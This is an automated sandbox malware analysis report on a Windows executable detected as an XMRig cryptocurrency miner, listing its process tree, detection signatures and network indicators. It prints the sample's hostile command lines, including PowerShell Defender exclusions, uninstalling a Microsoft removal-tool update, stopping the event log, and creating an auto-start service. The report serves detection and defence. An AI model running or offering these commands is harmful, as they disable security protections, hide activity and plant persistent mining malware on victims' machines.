Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
aA45th2ixY.exe

Overview

General Information

Sample name:aA45th2ixY.exe
renamed because original name is a hash value
Original sample name:40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e.exe
Analysis ID:1527537
MD5:6694e88cd0b76e774385e450b3027f35
SHA1:5049c878bbbbfbeee9a38489086cb77a94c8f663
SHA256:40c59f3c50480cd8732770ef31a0116865f62c75501dc1afe3a3a9ff89f39d8e
Tags:exeuser-Chainskilabs
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • aA45th2ixY.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\aA45th2ixY.exe" MD5: 6694E88CD0B76E774385E450B3027F35)
    • powershell.exe (PID: 7496 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7728 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7920 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7736 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7752 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7768 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7796 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7812 cmdline: C:\Windows\system32\sc.exe delete "OAQXWXCL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7984 cmdline: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8024 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8032 cmdline: C:\Windows\system32\sc.exe start "OAQXWXCL" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • kgpcbqezuufy.exe (PID: 8104 cmdline: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe MD5: 6694E88CD0B76E774385E450B3027F35)
    • powershell.exe (PID: 8116 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4884 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 3748 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 1456 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1148 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5020 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 5444 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 1696 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 3444 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            Change of critical system settings

            barindex
            Sigma detected: Disable power options
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7736, ProcessName: powercfg.exe

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7496, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7496, ProcessName: powershell.exe
            Sigma detected: New Service Creation Using Sc.EXE
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto", ProcessId: 7984, ProcessName: sc.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7496, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Sigma detected: Stop EventLog
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\aA45th2ixY.exe", ParentImage: C:\Users\user\Desktop\aA45th2ixY.exe, ParentProcessId: 7484, ParentProcessName: aA45th2ixY.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8024, ProcessName: sc.exe

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for dropped file
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeReversingLabs: Detection: 57%
            Multi AV Scanner detection for submitted file
            Source: aA45th2ixY.exeReversingLabs: Detection: 57%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: 00000025.00000002.4209894132.0000000000F55000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.2762941165.0000000000FEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3444, type: MEMORYSTR
            DNS related to crypt mining pools
            Source: unknownDNS query: name: xmr-eu1.nanopool.org
            Source: aA45th2ixY.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp

            Networking

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeNetwork Connect: 51.15.58.224 10343Jump to behavior
            Source: global trafficTCP traffic: 192.168.2.4:49731 -> 51.15.58.224:10343
            Source: Joe Sandbox ViewIP Address: 51.15.58.224 51.15.58.224
            Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: xmr-eu1.nanopool.org
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crl0
            Source: explorer.exe, 00000025.00000002.4210361767.0000000001A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.cloudflare.com/origin_ca.crle.s6$
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca
            Source: explorer.exe, 00000025.00000002.4209894132.0000000000FEA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000002.4209894132.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.cloudflare.com/origin_ca0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: kgpcbqezuufy.exe, 00000017.00000003.1829672482.0000025D41510000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0

            System Summary

            barindex
            Uses powercfg.exe to modify the power settings
            Source: C:\Users\user\Desktop\aA45th2ixY.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\aA45th2ixY.exeCode function: 0_2_00007FF6E17D1394 NtOpenThreadTokenEx,0_2_00007FF6E17D1394
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeCode function: 23_2_00007FF7B9E81394 NtQuerySecurityPolicy,23_2_00007FF7B9E81394
            Source: C:\Windows\System32\conhost.exeCode function: 35_2_0000000140001394 NtDelayExecution,35_2_0000000140001394
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeFile created: C:\Windows\TEMP\hnkcgwelkfzn.sysJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_b1xyt0mh.cjq.ps1
            Source: C:\Users\user\Desktop\aA45th2ixY.exeCode function: 0_2_00007FF6E17D3B500_2_00007FF6E17D3B50
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeCode function: 23_2_00007FF7B9E83B5023_2_00007FF7B9E83B50
            Source: C:\Windows\System32\conhost.exeCode function: 35_2_000000014000315035_2_0000000140003150
            Source: C:\Windows\System32\conhost.exeCode function: 35_2_00000001400026E035_2_00000001400026E0
            Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\hnkcgwelkfzn.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
            Source: C:\Users\user\Desktop\aA45th2ixY.exeCode function: String function: 00007FF6E17D1394 appears 33 times
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeCode function: String function: 00007FF7B9E81394 appears 33 times
            Source: aA45th2ixY.exeStatic PE information: invalid certificate
            Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@58/12@1/1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7992:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5572:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8128:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1748:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8048:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2056:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7788:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:736:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3068:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtezdwaf.ny4.ps1Jump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\explorer.exe
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeProcess created: C:\Windows\explorer.exeJump to behavior
            Source: aA45th2ixY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
            Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
